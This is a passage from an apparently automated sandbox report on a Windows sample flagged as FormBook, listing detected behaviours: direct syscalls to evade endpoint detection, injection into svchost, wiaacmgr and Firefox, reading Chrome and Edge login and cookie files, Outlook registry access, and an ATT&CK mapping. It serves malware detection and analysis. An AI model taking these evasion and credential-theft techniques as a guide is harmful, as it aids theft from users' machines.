Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]	2_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]	2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]	2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]	2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]	2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]	2_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h]	2_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]	2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]	2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]	2_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]	2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]	2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]	2_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]	2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]	2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]	2_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]	2_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h]	2_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]	2_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]	2_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]	2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]	2_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]	2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]	2_2_03C34859

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00B680A9

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3A124 SetUnhandledExceptionFilter,		0_2_00B3A124
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00B3A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtProtectVirtualMemory: Direct from: 0x77537B2E	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtTerminateThread: Direct from: 0x77542FCC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtUnmapViewOfSection: Direct from: 0x77542D3C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wiaacmgr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: NULL target: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: NULL target: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\wiaacmgr.exe

Thread register set: target process: 1524

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\wiaacmgr.exe

Thread APC queued: target process: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3129008

Jump to behavior

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B687B1 LogonUserW,

0_2_00B687B1

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B13B3A

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00B148D7

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B74C27 mouse_event,

0_2_00B74C27

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AuKUol8SPU.exe"	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Process created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00B67CAF

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B6874B

Source: AuKUol8SPU.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: kObgmFzfBE.exe, 00000003.00000002.2595780471.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000000.1512822290.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658361003.0000000001321000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: AuKUol8SPU.exe, kObgmFzfBE.exe, 00000003.00000002.2595780471.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000000.1512822290.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658361003.0000000001321000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: kObgmFzfBE.exe, 00000003.00000002.2595780471.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000000.1512822290.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658361003.0000000001321000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: kObgmFzfBE.exe, 00000003.00000002.2595780471.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000000.1512822290.0000000001901000.00000002.00000001.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658361003.0000000001321000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B3862B cpuid

0_2_00B3862B

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B44E87

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B51E06 GetUserNameW,

0_2_00B51E06

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00B43F3A

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B149A0

Source: AuKUol8SPU.exe, 00000000.00000003.1356635692.0000000001774000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1357414090.0000000001794000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000002.1376131751.0000000001794000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1359395072.000000000172F000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1359480041.0000000001791000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1358680926.0000000001794000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1357639462.0000000001794000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000002.1376265176.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1359198456.0000000001794000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: msmpeng.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\wiaacmgr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: AuKUol8SPU.exe	Binary or memory string: WIN_81
Source: AuKUol8SPU.exe	Binary or memory string: WIN_XP
Source: AuKUol8SPU.exe	Binary or memory string: WIN_XPe
Source: AuKUol8SPU.exe	Binary or memory string: WIN_VISTA
Source: AuKUol8SPU.exe	Binary or memory string: WIN_7
Source: AuKUol8SPU.exe	Binary or memory string: WIN_8
Source: AuKUol8SPU.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00B86283
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00B86747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
